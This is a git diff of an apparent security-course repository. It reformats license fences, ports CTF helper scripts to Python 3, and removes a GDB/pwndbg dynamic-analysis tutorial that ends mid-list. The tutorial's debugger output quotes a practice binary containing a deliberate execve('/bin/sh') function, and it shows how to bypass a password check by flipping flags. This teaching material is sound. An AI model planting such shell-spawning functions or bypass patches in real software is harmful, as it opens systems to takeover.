diff --git a/COPYING.md b/COPYING.md index 9778f06..1e1577f 100644 --- a/COPYING.md +++ b/COPYING.md @@ -7,7 +7,7 @@ A copy of each license is below. Copy of CC BY-SA 4.0: -``` +```text Attribution-NonCommercial-ShareAlike 4.0 International ======================================================================= @@ -449,7 +449,7 @@ Creative Commons may be contacted at creativecommons.org. Copy of BSD-3-Clause: -``` +```text Copyright 2021 University POLITEHNICA of Bucharest Redistribution and use in source and binary forms, with or without diff --git a/chapters/binary-analysis/dynamic-analysis/activities/04-challenge-call-me/src/calc_offset.py b/chapters/binary-analysis/dynamic-analysis/activities/04-challenge-call-me/src/calc_offset.py index dc4fe0f..efd1960 100644 --- a/chapters/binary-analysis/dynamic-analysis/activities/04-challenge-call-me/src/calc_offset.py +++ b/chapters/binary-analysis/dynamic-analysis/activities/04-challenge-call-me/src/calc_offset.py @@ -3,10 +3,10 @@ f = open("../flag") flag = f.readline().strip() f.close() -char = '\n' +char = "\n" res = [] for i in range(0, len(flag)): res += [ord(flag[i]) - ord(char)] -print "{" + ", ".join("{}".format(r) for r in res) + "};" +print("{" + ", ".join("{}".format(r) for r in res) + "};") diff --git a/chapters/binary-analysis/dynamic-analysis/activities/06-challenge-phone-home/sol/encrypt.py b/chapters/binary-analysis/dynamic-analysis/activities/06-challenge-phone-home/sol/encrypt.py index 3251650..319634d 100644 --- a/chapters/binary-analysis/dynamic-analysis/activities/06-challenge-phone-home/sol/encrypt.py +++ b/chapters/binary-analysis/dynamic-analysis/activities/06-challenge-phone-home/sol/encrypt.py @@ -1,29 +1,30 @@ from pwn import * flag = "SSS_CTF{0bad3910f14d10569b8bfe11aa1081e970e72e}\x00" -flag = ''.join(chr((ord(x) - 13) & 0xff) for x in flag) +flag = "".join(chr((ord(x) - 13) & 0xFF) for x in flag) parts = unpack_many(flag, 32) for i in range(len(parts)): - print('strvec[%d] = 0x%x;' % (i, 
parts[i])) + print("strvec[%d] = 0x%x;" % (i, parts[i])) def encrypt(data): - res = map(ord, data) - n = len(data) - print(hexdump(data)) - for i in range(n / 2): - res[i] = res[i] ^ res[n - i - 1] - res[n - i - 1] = (res[n - i - 1] - 1) & 0xff - return ''.join(map(chr, res)) + res = map(ord, data) + n = len(data) + print(hexdump(data)) + for i in range(n / 2): + res[i] = res[i] ^ res[n - i - 1] + res[n - i - 1] = (res[n - i - 1] - 1) & 0xFF + return "".join(map(chr, res)) + binary = ELF("./phone_home") -context.arch = 'i386' +context.arch = "i386" func_ea = binary.symbols["gen_flag"] chunk = binary.read(func_ea, 4096) -func_sz = chunk.find(asm('ret')) + 1 -print('Function size: 0x%x' % func_sz) +func_sz = chunk.find(asm("ret")) + 1 +print("Function size: 0x%x" % func_sz) func = encrypt(chunk[:func_sz]) binary.write(func_ea, func) diff --git a/chapters/binary-analysis/dynamic-analysis/reading/README.md b/chapters/binary-analysis/dynamic-analysis/reading/README.md index a70312c..6d44edd 100644 --- a/chapters/binary-analysis/dynamic-analysis/reading/README.md +++ b/chapters/binary-analysis/dynamic-analysis/reading/README.md @@ -1,985 +1,944 @@ ---- -linkTitle: Dynamic Analysis -type: docs -weight: 10 ---- - -# Dynamic Analysis - -## Introduction - -#### Objectives & Rationale - -The first part of this session will give you a walkthrough of the most common GDB principles that we are going to use in exploitation. In the second half, we are going to use these concepts in practice, to evade a basic key evaluation program. - -Black Box type analysis works best when standard algorithms are used in the program, such as: MD5, SHA1,RSA . We can change the input to a more suggestive one and use the output to estimate what function was used to convert it. - -Combined with behavioral analysis methods such as using sandboxes or strace/ltrace we can quickly map sections of code to functionalities. 
- -With dynamic analysis, packed malware can be extracted from memory in unpacked form, enabling us to continue static analysis on the complete binary. - -#### Prerequisites - -In the current session we will use GDB extensively. We assume that you are familiar with its basic usage and will move on quickly to some of its more advanced features. - -To brush up on the GDB basics, read this [Refresher](https://security.cs.pub.ro/summer-school/wiki/session/04-gdb "session:04-gdb"). - -The executable used in the demo is called sppb and is the challenge 1 binary. - -###### Before GDB - -##### One thing you should always do before firing up GDB is to try to learn all the available information on the executable you\'re trying to debug through the techniques that have been presented so far. - -For the purposes of this session it is a good idea to always run`objdump` on all the executable files before attaching GDB to them so that you have a better idea of what goes where. - -``` {.code .bash} -$ objdump -M intel -d [executable] -``` - -### GDB Basic Commands - -#### Getting help with GDB - -Whenever you want to find out more information about GDB commands feel free to search for it inside [the documentation](http://www.gnu.org/software/gdb/documentation/ "http://www.gnu.org/software/gdb/documentation/") or by using the `help` command followed by your area of interest. For example searching for help for the `disassemble` command can be obtained by running the following command in GDB: - -``` {.code .bash} -#print info about all help areas available -#identify the area of your question -(gdb) help -#print info about available data commands -#identify the command you want to learn more about -(gdb) help data -#print info about a specific command -#find out more about the command you are searching for -(gdb) help disassemble -``` - -#### Opening a program with GDB - - -A program can be opened for debugging in a number of ways. 
We can run -GDB directly attaching it to a program: - -``` {.code .bash} -$ gdb [executable-file] -``` - -Or we can open up GDB and then specify the program we are trying to -attach to using the file or file-exec command: - -``` {.code .bash} -$ gdb -(gdb) file [executable-file] -``` - -Furthermore we can attach GDB to a running service if we know its -process id: - -``` {.code .bash} -$ gdb --pid [pid_number] -``` - - -#### Disassembling - - -GDB allows disassembling of binary code using the `disassemble` command -(it may be shortened to `disas`). The command can be issued either on a -memory address or using labels. - -``` {.code .bash} -(gdb) disassemble *main -Dump of assembler code for function main: - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -=> 0x080491d0 <+7>: mov eax,ds:0x804c030 -....Output ommited..... -(gdb) disassemble 0x080491c9 -Dump of assembler code for function main: - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -=> 0x080491d0 <+7>: mov eax,ds:0x804c030 -``` - - -#### Adding Breakpoints - - -Breakpoints are important to suspend the execution of the program being debugged in a certain place. Adding breakpoints is done with the `break` -command. A good idea is to place a breakpoint at the main function of the program you are trying to exploit. Given the fact that you have already run `objdump` and disassembled the program you know the address for the start of the main function. 
This means that we can set a -breakpoint for the start of our program in two ways: - -``` {.code .bash} -(gdb) break *main (when the binary is not stripped of symbols) -(gdb) break *0x[main_address_obtained_with_objdump] (when aslr is off) -``` - -The general format for setting breakpoints in GDB is as follows: - -``` {.code .bash} -(gdb) break [LOCATION] [thread THREADNUM] [if CONDITION] -``` - -*Issuing the `break` command with no parameters will place a breakpoint* *at the current address.* - -*GDB allows using abbreviated forms for all the commands it supports. Learning these abbreviations comes with time and will greatly improve your work output. Always be on the lookout for using abbreviated commands.* - -The abbreviated command for setting breakpoints is simply `b`. - -#### Listing Breakpoints - - -At any given time all the breakpoints in the program can be displayed using the `info breakpoints` command: - -``` {.code .bash} -(gdb) info breakpoints -``` - -*You can also issue the abbreviated form of the command* - -``` {.code .bash} -(gdb) i b -``` - -#### Deleting Breakpoints - -Breakpoints can be removed by issuing the `delete breakpoints` command followed by the breakpoint's number, as it is listed in the output of the -`info breakpoints` command. - -``` {.code .bash} -(gdb) delete breakpoints [breakpoint_number] -``` - -*You can also delete all active breakpoints by issuing the* `delete breakpoints` *command with no parameters:* - -``` {.code .bash} -(gdb) delete breakpoints -``` - -Once a breakpoint is set you would normally want to launch the program into execution. You can do this by issuing the `run` command. The program will start executing and stop at the first breakpoint you have -set.
- -``` {.code .bash} -(gdb) run -``` - -#### Execution flow - -Execution flow can be controlled in GDB using the `continue`, `stepi`,`nexti` as follows: - -``` {.code .bash} -(gdb) help continue -#Continue program being debugged, after signal or breakpoint. -#If proceeding from breakpoint, a number N may be used as an argument, -#which means to set the ignore count of that breakpoint to N - 1 (so that -#the breakpoint won't break until the Nth time it is reached). -(gdb) help stepi -#Step one instruction exactly. -#Argument N means do this N times (or till program stops for another reason). -(gdb) help nexti -#Step one instruction, but proceed through subroutine calls. -#Argument N means do this N times (or till program stops for another reason). -``` - -*You can also use the abbreviated format of the commands: `c`* -*(`continue`), `si` (`stepi`), `ni` (`nexti`).* - -*If at any point you want to start the program execution from the* *beginning you can always reissue the `run` command.* - -Another technique that can be used for setting breakpoints is using offsets. - -As you already know, each assembly instruction takes a certain number of bytes inside the executable file. This means that whenever you are setting breakpoints using offsets you must always set them at instruction boundaries. - -``` {.code .bash} -(gdb) break *main -Breakpoint 1 at 0x80491d0 -(gdb) run -Starting program: sppb - -Breakpoint 1, 0x80491d0 in main () -(gdb) disassemble main -Dump of assembler code for function main: - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -.....Output ommited..... -(gdb) break *main+4 -Breakpoint 2 at 0x80491cd -``` - - -### Examine and Print, your most powerful tools - - -GDB allows examining of memory locations be them specified as addresses or stored in registers. 
The `x` command (for *examine*) is arguably one -of the most powerful tool in your arsenal and the most common command you are going to run when exploiting. - -The format for the `examine` command is as follows: - -``` {.code .bash} -(gdb) x/nfu [address] - n: How many units to print - f: Format character - a Pointer - c Read as integer, print as character - d Integer, signed decimal - f Floating point number - o Integer, print as octal - s Treat as C string (read all successive memory addresses until null character and print as characters) - t Integer, print as binary (t="two") - u Integer, unsigned decimal - x Integer, print as hexadecimal - u: Unit - b: Byte - h: Half-word (2 bytes) - w: Word (4 bytes) - g: Giant word (8 bytes) - i: Instruction (read n assembly instructions from the specified memory address) -``` - -In contrast with the examine command, which reads data at a memory location the `print` command (shorthand `p`) prints out values stored in -registers and variables. - -The format for the `print` command is as follows: - -``` {.code .bash} -(gdb) p/f [what] - f: Format character - a Pointer - c Read as integer, print as character - d Integer, signed decimal - f Floating point number - o Integer, print as octal - s Treat as C string (read all successive memory addresses until null character and print as characters) - t Integer, print as binary (t="two") - u Integer, unsigned decimal - x Integer, print as hexadecimal - i Instruction (read n assembly instructions from the specified memory address) -``` - -For a better explanation please follow through with the following example: - -``` {.code .bash} -#a breakpoint has been set inside the program and the program has been run with the appropriate commands to reach the breakpoint -#at this point we want to see which are the following 10 instructions -(gdb) x/10i 0x80491cd - 0x80491cd : sub esp,0x4 - 0x80491d0 : mov eax,ds:0x804c030 - 0x80491d5 : push 0x0 - 0x80491d7 : push 0x1 - 0x80491d9 : push 0x0 - 
0x80491db : push eax - 0x80491dc : call 0x8049080 -#let's examine the memory at 0x804a02a because we have a hint that this address holds one of the parameters of the scanf call as it is afterwards placed on the stack (we'll explain later how we have reached this conclusion) -#the other parameter will be an address where the input will be stored -(gdb) x/s 0x804a02a -0x804a02a: "%d" -# we now set a breakpoint for *main+56 -(gdb) break *0x08049201 -Breakpoint 3 at 0x08049201 -(gdb) continue -Continuing. - -Breakpoint 3, 0x08049201 in main () -We then record the value of the eax register somewhere and use nexti(ni) and then we input an integer. -#let's examine the address which we recorded earlier corresponding to the eax register (it should've held the address for the integer we input) -#take note that in GDB registers are preceded by the "$" character very much like variables -(gdb) x/d 0xffffcf70 <- (your address) -0xffffcf70: -#now let's print the contents of the eax register as hexadecimal -(gdb) p/x $eax -$1 = - -The diference between p and x can be observed by issuing the following commands: -x/s 0x804a030 -0x804a030: "Your password is: %d. Evaluating it...\n" - -p /s 0x804a030 - -$2 = 1920298841 which is the number in decimal format that "Your" can be translated to by its ascii codes (little endian so written as 0x72756F59). - -In order to see the same result we must use the command p /s (char*)0x804a030 and dereference the pointer ourselves -# as you can see the address holds the memory for the beginning of the string -# this shows you how "x" interprets data from memory while "p" merely prints out the contents in the required format -# you can think of it as "x" dereferencing while "p" not dereferencing -``` - - -### GDB command file - - - -When exploiting, there are a couple of commands that you will issue periodically and doing that by hand will get cumbersome. 
GDB commands -files will allow you to run a specific set of commands automatically after each command you issue manually. This comes in especially handy -when you\'re stepping through a program and want to see what happens with the registers and stack after each instruction is ran, which is the -main target when exploiting. - -The examine command only has sense when code is already running on the machine so inside the file we are going to use the display command which -translates to the same output. - -In order to use this option you must first create your commands file. This file can include any GDB commands you like but a good start would -be printing out the content of all the register values, the next ten instructions that are going to be executed, and some portion from the -top of the stack. - -The reason for examining all of the above after each instruction is ran will become more clear once the we go through the second section of the -session. - -Command file template: - -``` {.code .bash} -display/10i $eip -display/x $eax -display/x $ebx -display/x $ecx -display/x $edx -display/x $edi -display/x $esi -display/x $ebp -display/32xw $esp -``` - -In order to view all register values you could use the `x` command. 
-However the values of all registers can be obtained by running the`info all-registers` command: - -``` {.code .bash} -(gdb) info all-registers -eax 0x8048630,134514224 -ecx 0xbffff404,-1073744892 -edx 0xbffff394,-1073745004 -ebx 0xb7fc6ff4,-1208193036 -esp 0xbffff330,0xbffff330 -ebp 0xbffff368,0xbffff368 -esi 0x0,0 -edi 0x0,0 -eip 0x80484e9,0x80484e9 -eflags 0x286,[ PF SF IF ] -cs 0x73,115 -ss 0x7b,123 -ds 0x7b,123 -es 0x7b,123 -fs 0x0,0 -gs 0x33,51 -st0 *value not available* -st1 *value not available* -st2 *value not available* -st3 *value not available* -st4 *value not available* -st5 *value not available* -st6 *value not available* -st7 *value not available* -fctrl 0x37f,895 -fstat 0x0,0 -ftag 0xffff,65535 -fiseg 0x0,0 -fioff 0x0,0 -foseg 0x0,0 ----Type to continue, or q to quit--- -fooff 0x0,0 -fop 0x0,0 -mxcsr 0x1f80,[ IM DM ZM OM UM PM ] -ymm0 *value not available* -ymm1 *value not available* -ymm2 *value not available* -ymm3 *value not available* -ymm4 *value not available* -ymm5 *value not available* -ymm6 *value not available* -ymm7 *value not available* -mm0 *value not available* -mm1 *value not available* -mm2 *value not available* -mm3 *value not available* -mm4 *value not available* -mm5 *value not available* -mm6 *value not available* -mm7 *value not available* -``` - -*One thing you might notice while using GDB is that addresses seem to be pretty similar between runs. Although with experience you will gain a better feel for where an address points to, one thing to remember at this point would be that stack addresses usually have the `0xbffff….` format. In order to run GDB with the commands file you have just generated, when launching GDB specify the `-x [command_file]` parameter.* - -### Using GDB to modify variables - -GDB can be used to modify variables during runtime. In the case of exploitation this comes in handy as the program can be altered at -runtime with the purpose of changing the execution path to desired branches. 
- -### PWNDBG - - -As you can see using GDB can be cumbersome, this is why we recommend using the pwndbg plug-in. The tutorial as well as the repository of the project can be found here [Pwndbg](https://github.com/pwndbg/pwndbg "https://github.com/pwndbg/pwndbg") - -Give the fact that pwndbg is just a wrapper, all the functionality of GDB will be available when running gdb with the`pwndbg` plug-in. Some of the advantages of using pwngdb include: - -1. Automatic preview of registers, code and stack after each instruction (you no longer need to create your own commands file) -2. Automatic dereferencing and following through of memory locations -3. Color coding - -An alternative to pwndbg is [Gef](https://github.com/hugsy/gef "https://github.com/hugsy/gef"). However, this tutorial is designed with Pwndbg in mind. - -#### PWNDBG Commands - -`pdis` command gives a pretty output that is similar to what the `disas` -command in GDB prints: - -``` {.code .bash} -Usage: pdis 0x80491d0 -``` - -If `pdis` is used with an address as a parameter, the output will be similar to what `x/Ni` prints out (where N is the number of instructions you want to disassemble) Usage: -pdis \[address\] [N] - where N is the number of instructions you want to be printed - -The `stepi` command has the same effect as in GDB however, if you are running PWNDBG you will notice that after each step PWNDBG will automatically print register values, several lines of code from eip -register and a portion of the stack: - -``` {.code .bash} -pwndbg> stepi - -LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA -────────────────────────────────────[ REGISTERS ]──────────────────────────────────── -*EAX 0xf7facd20 (_IO_2_1_stdout_) ◂— 0xfbad2084 - EBX 0x0 - ECX 0xa00af61b - EDX 0xffffcfb4 ◂— 0x0 - EDI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c - ESI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c - EBP 0xffffcf78 ◂— 0x0 - ESP 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -*EIP 0x80491d5 (main+12) 
◂— push 0 /* 'j' */ -─────────────────────────────────────[ DISASM ]────────────────────────────────────── - 0x80491d0 mov eax, dword ptr [stdout@GLIBC_2.0] <0x804c030> - ► 0x80491d5 push 0 - 0x80491d7 push 1 - 0x80491d9 push 0 - 0x80491db push eax - 0x80491dc call setvbuf@plt - - 0x80491e1 add esp, 0x10 - 0x80491e4 mov dword ptr [ebp - 8], 0 - 0x80491eb push 0x804a010 - 0x80491f0 call puts@plt - - 0x80491f5 add esp, 4 -──────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────── -In file: /home/kali/Desktop/dokermaker/binary-internal/sessions/05-dynamic-analysis/activities/01-02-challenge-sppb/src/sppb.c - 6 execve("/bin/sh", 0, 0); - 7 } - 8 - 9 int main() - 10 { - ► 11 setvbuf(stdout, NULL, _IOLBF, 0); - 12 int readValue = 0; - 13 - 14 printf("Please provide password: \n"); - 15 scanf("%d", &readValue); - 16 -──────────────────────────────────────[ STACK ]────────────────────────────────────── -00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -01:0004│ 0xffffcf74 ◂— 0x0 -02:0008│ ebp 0xffffcf78 ◂— 0x0 -03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 -04:0010│ 0xffffcf80 ◂— 0x1 -05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 -────────────────────────────────────[ BACKTRACE ]──────────────────────────────────── - ► f 0 0x80491d5 main+12 - f 1 0xf7de0fd6 __libc_start_main+262 - -``` - - -You can always use the following commands to obtain context at any given -moment inside the debug process: - -1. `context reg` -2. `context code` -3. `context stack` -4. `context all` - -One additional PWNDBG command which can be used to show values in registers is the `telescope` command. The command dereferentiates pointer values until it gets to a value and prints out the entire trace. 
- -The command can be used with both registers and memory addresses: - -``` {.code .bash} -pwndbg$ telescope $esp -00:0000│ esp 0xffffcf70 —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -01:0004│ 0xffffcf74 ◂— 0x0 -02:0008│ ebp 0xffffcf78 ◂— 0x0 -03:000c│ 0xffffcf7c —▸ 0xf7de0fd6 (__libc_start_main+262) ◂— add esp, 0x10 -04:0010│ 0xffffcf80 ◂— 0x1 -05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 -pwndbg> telescope 0xffffcf84 -00:0000│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -01:0004│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -02:0008│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 -03:000c│ 0xffffcf90 —▸ 0xffffcfc4 ◂— 0xe38ae80b -04:0010│ 0xffffcf94 —▸ 0xf7ffdb60 —▸ 0xf7ffdb00 —▸ 0xf7fc93e0 —▸ 0xf7ffd9a0 ◂— ... -05:0014│ 0xffffcf98 —▸ 0xf7fc9410 —▸ 0x804832d ◂— 'GLIBC_2.0' -06:0018│ 0xffffcf9c —▸ 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1e9d6c -07:001c│ 0xffffcfa0 ◂— 0x1 -``` - -In the example above, the memory address 0x8048630 was loaded into EAX. That is why examining the register or the memory location gives the same output. - -For more information on various PWNdbg commands you can always visit the PWNdbg help through the `pwndbg` command It is always a better idea to use PWNdbg commands when available. However you should also know the basics of using GDB as well. - - -#### Altering variables and memory with PWNdbg and GDB - - -In addition to basic registers, GDB has a two extra variables which map onto some of the existing registers, as follows: - -- `$pc – $eip` - -- `$sp – $esp` - -- `$fp – $ebp` - -In addition to these there are also two registers which can be used to view the processor state `$ps – processor status` - -Values of memory addresses and registers can be altered at execution time. 
Because altering memory is a lot easier using PWNdbg we are going to -use it throughout today\'s session. - -The easiest way of altering the execution flow of a program is editing the `$eflags` register just before jump instructions. - -Using GDB the `$eflags` register can be easily modified: - -``` {.code .bash} -pwndbg> reg eflags -EFLAGS 0x282 [ cf pf af zf SF IF df of ] -Set the ZF flag -pwndbg> set $eflags |= (1 << 6) -Clear the ZF flag -pwndbg> set $eflags &= ~(1 << 6) -``` - - -Notice that the flags that are set are printed in all-caps when the`reg eflags` command is issued. - -The `set` command (GDB native) can be used to modify values that reside inside memory. - -``` {.code .bash} -pwndbg> telescope 0x804a010 -00:0000│ 0x804a010 ◂— 'Please provide password: ' -01:0004│ 0x804a014 ◂— 'se provide password: ' -02:0008│ 0x804a018 ◂— 'rovide password: ' -03:000c│ 0x804a01c ◂— 'de password: ' -04:0010│ 0x804a020 ◂— 'assword: ' -05:0014│ 0x804a024 ◂— 'ord: ' -06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ -07:001c│ 0x804a02c ◂— 0x0 - -pwndbg> set {char [14]} 0x804a010 = "No pass here" -Written 28 bytes to 0x8048630 -pwndbg> telescope 0x8048630 -00:0000│ 0x804a010 ◂— 'No pass here' -01:0004│ 0x804a014 ◂— 'ass here' -02:0008│ 0x804a018 ◂— 'here' -03:000c│ 0x804a01c ◂— 0x70200000 -04:0010│ 0x804a020 ◂— 'assword: ' -05:0014│ 0x804a024 ◂— 'ord: ' -06:0018│ 0x804a028 ◂— 0x64250020 /* ' ' */ -07:001c│ 0x804a02c ◂— 0x0 -``` - -As you can see the string residing in memory at address `0x8048630` has been modified using the `set` command. - -Pwngdb does not offer enhancements in modifying registry values. For modifying registry values you can use the GDB `set` command. - -``` {.code} -pwngdb> p/x $eax -$10 = 0x1 -pwngdb> set $eax=0x80 -pwngdb> p/x $eax -$11 = 0x80 -``` - - -### Enough with GDB (for a while) - - -The following section will describe the process of function calling in detail. 
Understanding function calling and stack operations during program execution is essential to exploitation. - -### The Stack - -The stack is one of the areas of memory which gets the biggest attention in exploitation writing. - - -#### Stack Growth - - -The stack grows from high memory addresses to low memory addresses. - -``` {.code .bash} -pwndbg> pdis $eip - - 0x80491db push eax - 0x80491dc call setvbuf@plt - - 0x80491e1 add esp, 0x10 - 0x80491e4 mov dword ptr [ebp - 8], 0 - 0x80491eb push 0x804a010 - ► 0x80491f0 call puts@plt - -pwndbg> p/x $esp -$1 = 0xffffcf6c -pwndbg> si -0x8049050 in puts@plt () -pwndbg> p/x $esp -$5 = 0xffffcf68 -``` - -As you can see from the example above the \$esp register had an initial value of `0xffffcf6c`. The next instruction that is about to be executed is a `call` (it pushes the return address on the stack). We execute the instruction and then reevaluate the value of `$esp`. As we can see `$esp` now points to `0xffffcf68` (`0xffffcf6c-0x4`). - - -#### Frame pointers and local function variables - - -Whenever the processor is entering the execution for a function, a special logical container is created on the stack for that function. - -This container is called a function frame. The idea behind it is that the processor must know which area of the stack belongs to which function. - -In order to achieve this logical segmentation a set of 2 instructions are automatically inserted by the compiler at the beginning of each function. Can you tell what they are based on the output below?
- -``` {.code .bash} -pwndbg> break main -Breakpoint 1 at 0x80484c8 -pwndbg> run -[----------------------------------registers-----------------------------------] - EAX 0xf7fa99e8 (environ) —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' - EBX 0x0 - ECX 0xb8a6a751 - EDX 0xffffcfb4 ◂— 0x0 - EDI 0x80490a0 (_start) ◂— xor ebp, ebp - ESI 0x1 - EBP 0xffffcf78 ◂— 0x0 - ESP 0xffffcf70 ◂— 0x1 - EIP 0x80491d0 (main+7) ◂— mov eax, dword ptr [0x804c030] -[-------------------------------------code-------------------------------------] - 0x080491c9 <+0>: push ebp - 0x080491ca <+1>: mov ebp,esp - 0x080491cc <+3>: push ebx - 0x080491cd <+4>: sub esp,0x4 -=> 0x080491d0 <+7>: mov eax,ds:0x804c030 - 0x080491d5 <+12>: push 0x0 - 0x080491d7 <+14>: push 0x1 - 0x080491d9 <+16>: push 0x0 - 0x080491db <+18>: push eax - -[------------------------------------stack-------------------------------------] -00:0000│ esp 0xffffcf70 ◂— 0x1 -01:0004│ 0xffffcf74 ◂— 0x0 -02:0008│ ebp 0xffffcf78 ◂— 0x0 -03:000c│ 0xffffcf7c —▸ 0xf7dda905 (__libc_start_main+229) ◂— add esp, 0x10 -04:0010│ 0xffffcf80 ◂— 0x1 -05:0014│ 0xffffcf84 —▸ 0xffffd024 —▸ 0xffffd1d9 ◂— '/home/kali/Desktop/sppb' -06:0018│ 0xffffcf88 —▸ 0xffffd02c —▸ 0xffffd24d ◂— 'COLORFGBG=15;0' -07:001c│ 0xffffcf8c —▸ 0xffffcfb4 ◂— 0x0 - -[------------------------------------------------------------------------------] -Legend: code, data, rodata, value - -Breakpoint 1, 0x080491d0 in main () -pwndbg> disass password_accepted - - - 0x080491b2 <+0>: push ebp - 0x080491b3 <+1>: mov ebp,esp - 0x080491b5 <+3>: push 0x0 - 0x080491b7 <+5>: push 0x0 - 0x080491b9 <+7>: push 0x804a008 - 0x080491be <+12>: call 0x8049070 - 0x080491c3 <+17>: add esp,0xc - 0x080491c6 <+20>: nop - 0x080491c7 <+21>: leave - 0x080491c8 <+22>: ret - -``` - -What we did is we created a breakpoint for the start of the main function and then ran the program. As you can see the first 2 instructions that got executed were `push ebp` and `mov ebp,esp`. 
- -We then set a breakpoint for another function called `password_accepted`, continued execution and entered a password that we know is going to pass validation. Once the breakpoint is hit, we can see the same 2 instructions `push ebp` and `mov ebp,esp`. - -The two instructions which can be noticed at the beginning of any function are the instructions required for creating the logical container for each function on the stack. - -In essence what they do is save the reference of the old container (`push ebp`) and record the current address at the top of the stack as the beginning of the new container (`mov ebp,esp`). - -For a visual explanation please see below: - -

- Sublime's custom image -

- -As you can see the EBP register always points to the stack address that corresponds to the beginning of the current function\'s frame. That is why it is most often referred to as the frame pointer. - -In addition to the two instructions required for creating a new stack frame for a function, there are a couple more instructions that you will usually see at the beginning of a function. - -If you analyze the instructions at the beginning of main, you can spot these as being: - -1. An `and esp,0xfffffff0` instruction. - -2. A `sub` instruction that subtracts a hex value from ESP. - -The first of the two instructions has the purpose of aligning the stack to a specific address boundary. This is done to increase processor efficiency. In our specific case, the top of the stack gets aligned to a 16 byte multiple address. - -One of the purposes of the stack inside functions is that of offering address space in which to place local variables. The second instruction preallocates space for local function variables. - -Let\'s see how local variables are handled inside assembly code. - -``` {.code .c} -#include -int main() -{ - int a; - a=1; - return 0; -} -``` - -``` {.code .bash} -kali@kali:~/sss$ gdb test -GNU gdb (Ubuntu/Linaro 7.4-2012.02-0ubuntu2) 7.4-2012.02 -Copyright (C) 2012 Free Software Foundation, Inc. -License GPLv3+: GNU GPL version 3 or later -This is free software: you are free to change and redistribute it. -There is NO WARRANTY, to the extent permitted by law. Type "show copying" -and "show warranty" for details. -This GDB was configured as "i686-linux-gnu". -For bug reporting instructions, please see: -... -Reading symbols from /home/dgioga/sss/test...(no debugging symbols found)...done.
-pwndbg> break main -Breakpoint 1 at 0x80483ba -pwndbg> run -[----------------------------------registers-----------------------------------] -EAX: 0x1 -EBX: 0xb7fc6ff4 --> 0x1a0d7c -ECX: 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") -EDX: 0xbffff3a4 --> 0xb7fc6ff4 --> 0x1a0d7c -ESI: 0x0 -EDI: 0x0 -EBP: 0xbffff378 --> 0x0 -ESP: 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) -EIP: 0x80483ba (:,mov DWORD PTR [ebp-0x4],0x1) -EFLAGS: 0x200282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) -[-------------------------------------code-------------------------------------] - 0x80483b4
:, push ebp - 0x80483b5 :,mov ebp,esp - 0x80483b7 :,sub esp,0x10 -=> 0x80483ba :,mov DWORD PTR [ebp-0x4],0x1 - 0x80483c1 :,mov eax,0x0 - 0x80483c6 :,leave - 0x80483c7 :,ret - 0x80483c8:,nop -[------------------------------------stack-------------------------------------] -0000| 0xbffff368 --> 0x80483d9 (<__libc_csu_init+9>:,add ebx,0x1c1b) -0004| 0xbffff36c --> 0xb7fc6ff4 --> 0x1a0d7c -0008| 0xbffff370 --> 0x80483d0 (<__libc_csu_init>:,push ebp) -0012| 0xbffff374 --> 0x0 -0016| 0xbffff378 --> 0x0 -0020| 0xbffff37c --> 0xb7e3f4d3 (<__libc_start_main+243>:,mov DWORD PTR [esp],eax) -0024| 0xbffff380 --> 0x1 -0028| 0xbffff384 --> 0xbffff414 --> 0xbffff576 ("/home/dgioga/sss/test") -[------------------------------------------------------------------------------] -Legend: code, data, rodata, value - -Breakpoint 1, 0x080483ba in main () -``` - -As you can see the operations that relate to the stack are: - -1. The old frame pointer is saved. - -2. EBP takes the value of ESP (the frame pointer is set to point to the current function\'s frame). - -3. `0x10` is subtracted from ESP (reserve space for local variables). - -4. The value `0x01` is placed at the address of EBP-0x4 (the local - variable `a` takes the value 1). - -#### Function parameters - - -The stack is also used to pass in parameters to functions. - -In the process of calling a function we can define two entities. The callee (the function that gets called) and the caller (the function that calls). - -When a function is called, the caller pushes the parameters for the callee on the stack. The parameters are pushed in reverse order. - -When the callee wants to get access to the parameters it was called with, all it needs to do is access the area of the stack that is higher up in reference to the start of it\'s frame. - -At this point it makes sense to remember the following cases: - -1. When EBP+value is referred to it is generally a referral to a parameter passed in to the current function. - -2. 
